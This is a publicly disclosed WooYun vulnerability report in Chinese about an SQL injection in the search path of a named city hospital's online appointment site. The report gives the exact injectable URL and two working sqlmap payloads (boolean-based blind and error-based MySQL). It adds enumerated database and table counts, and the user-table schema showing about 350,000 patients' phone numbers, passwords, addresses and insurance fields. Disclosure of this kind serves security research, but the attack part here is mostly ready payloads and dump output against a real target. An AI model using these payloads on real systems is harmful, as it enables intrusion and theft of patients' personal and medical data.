当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144010

漏洞标题:某市医院网上挂号平台存在SQL注入可导致35W用户信息(手机/性别/用户密码/地址/就诊订单等)

相关厂商:qingdaonews.com

漏洞作者: 路人甲

提交时间:2015-09-29 10:35

修复时间:2015-10-12 19:36

公开时间:2015-10-12 19:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-29: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

漏洞地址:

http://guahao.qingdaonews.com/YyYisheng/index/keyword/a*.html


搜索处存在注入

---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://guahao.qingdaonews.com:80/YyYisheng/index/keyword/a'||(SELECT 'WzEV' FROM DUAL WHERE 7222=7222 RLIKE (SELECT (CASE WHEN (6650=6650) THEN 0x61 ELSE 0x28 END)))||'.html
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://guahao.qingdaonews.com:80/YyYisheng/index/keyword/a'||(SELECT 'iTtQ' FROM DUAL WHERE 5753=5753 AND (SELECT 2866 FROM(SELECT COUNT(*),CONCAT(0x7162787a71,(SELECT (ELT(2866=2866,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'.html
---
[22:52:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.25
back-end DBMS: MySQL 5.0

漏洞证明:

数据库:

dbs.png


35W用户详细信息,账户密码、性别、地址、邮编等等。上百万订单信息。

Database: qd_guahao
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| gh_czjilu                             | 738765  |
| order_extend                          | 583381  |
| user_order_1314                       | 467246  |
| gh_error                              | 415887  |
| user_message                          | 396910  |
| gh_user                               | 352610  |
| te_mobile                             | 312228  |
| user_order                            | 298907  |
| jb_views                              | 195963  |
| user_order_201501_05                  | 175184  |
| user_friend                           | 46855   |
| user_pingjia                          | 16339   |
| jb_symtodis                           | 7262    |
| bank_record                           | 4144    |
| yy_yisheng                            | 3656    |
| qy_stopsend                           | 3397    |
| jb_parttodis                          | 3344    |
| jb_disease                            | 2390    |
| yy_news                               | 1755    |
| yy_month                              | 1744    |
| yy_keshi                              | 1002    |
| gh_messstat                           | 1000    |
| qy_stops                              | 914     |
| ys_outsys                             | 752     |
| yy_doctodis                           | 711     |
| jb_symptom                            | 574     |
| gh_problem                            | 499     |
| jb_sympart                            | 461     |
| gh_keshi                              | 272     |
| gh_ceping                             | 168     |
| gh_main                               | 160     |
| gh_yiyuan                             | 58      |
| gh_phoner                             | 23      |
| gh_gonggao                            | 22      |
| jb_part                               | 22      |
| gh_adrole                             | 9       |
| order_deal                            | 6       |
| ask_mess                              | 5       |
| ask_messback                          | 2       |
| gh_config                             | 1       |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ec_bill_country                       | 3232    |
| ec_cvcolumnlist                       | 739     |
| ec_picklist                           | 540     |
| ec_cvadvfilter                        | 345     |
| ec_parenttabrel                       | 324     |
| ec_cvadvfilterfenzu                   | 305     |
| ec_field                              | 191     |
| ec_def_org_field                      | 173     |
| ec_loginhistory                       | 144     |
| ec_cvstdfilter                        | 69      |
| ec_cvstdfilterfenzu                   | 61      |
| ec_blocks                             | 60      |
| ec_customview                         | 43      |
| ec_fenzu                              | 26      |
| ec_modulelist                         | 24      |
| ec_crmentity                          | 22      |
| ec_entityname                         | 16      |
| ec_tab                                | 14      |
| ec_appkey_seq                         | 12      |
| ec_customfield_sequence_seq           | 12      |
| ec_fenzu_seq                          | 12      |
| ec_field_seq                          | 12      |
| ec_loginhistory_seq                   | 12      |
| ec_mailids_seq                        | 12      |
| ec_maillists_seq                      | 12      |
| ec_maillogs_seq                       | 12      |
| ec_mailsets_seq                       | 12      |
| ec_memdayconfig_seq                   | 12      |
| ec_messageaccounttmpslogs_seq         | 12      |
| ec_multifield_seq                     | 12      |
| ec_picklist_seq                       | 12      |
| ec_productfieldlist_seq               | 12      |
| ec_qunfas_seq                         | 12      |
| ec_relatedlists_seq                   | 12      |
| ec_selectquery_seq                    | 12      |
| ec_sendsmsbox_seq                     | 12      |
| ec_smslogs_seq                        | 12      |
| ec_systems_seq                        | 12      |
| ec_users_seq                          | 12      |
| ec_relatedlists                       | 9       |
| ec_account                            | 8       |
| ec_users                              | 6       |
| ec_crmentity_seq                      | 4       |
| ec_maillists                          | 4       |
| ec_notes                              | 4       |
| ec_maillogs                           | 3       |
| ec_parenttab                          | 3       |
| ec_maillisttmps                       | 2       |
| ec_multifield                         | 2       |
| ec_productfieldlist                   | 2       |
| ec_products                           | 2       |
| ec_bill_country_seq                   | 1       |
| ec_contacts                           | 1       |
| ec_customview_seq                     | 1       |
| ec_inventoryproductrel                | 1       |
| ec_memdayconfig                       | 1       |
| ec_message                            | 1       |
| ec_queue                              | 1       |
| ec_queuemessage                       | 1       |
| ec_qunfatmps                          | 1       |
| ec_salesorder                         | 1       |
| ec_smslogs                            | 1       |
| ec_systems                            | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1477    |
| STATISTICS                            | 293     |
| GLOBAL_STATUS                         | 292     |
| SESSION_STATUS                        | 292     |
| SESSION_VARIABLES                     | 291     |
| GLOBAL_VARIABLES                      | 282     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195     |
| COLLATIONS                            | 195     |
| PARTITIONS                            | 165     |
| TABLES                                | 165     |
| KEY_COLUMN_USAGE                      | 114     |
| TABLE_CONSTRAINTS                     | 104     |
| CHARACTER_SETS                        | 39      |
| SCHEMA_PRIVILEGES                     | 18      |
| PLUGINS                               | 14      |
| ENGINES                               | 5       |
| SCHEMATA                              | 4       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+


user表:

Database: qd_guahao
Table: gh_user
[23 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| user_address   | varchar(255)        |
| user_email     | varchar(30)         |
| user_fav_ys    | varchar(255)        |
| user_fav_yy    | tinyint(1) unsigned |
| user_id        | int(11) unsigned    |
| user_ip        | varchar(15)         |
| user_messages  | int(8) unsigned     |
| user_mobile    | varchar(11)         |
| user_mobile_yz | tinyint(1) unsigned |
| user_pass      | varchar(18)         |
| user_pass2     | varchar(4)          |
| user_password  | varchar(32)         |
| user_password2 | varchar(3)          |
| user_realname  | varchar(10)         |
| user_sex       | varchar(2)          |
| user_status    | tinyint(1)          |
| user_time      | int(11) unsigned    |
| user_type      | tinyint(1)          |
| user_ybkh      | varchar(12)         |
| user_ybkl      | tinyint(1) unsigned |
| user_youbian   | varchar(6)          |
| user_yywg      | int(11) unsigned    |
| user_yywg_lj   | int(4) unsigned     |
+----------------+---------------------+


1.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-12 19:36

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

2015-10-12:很严重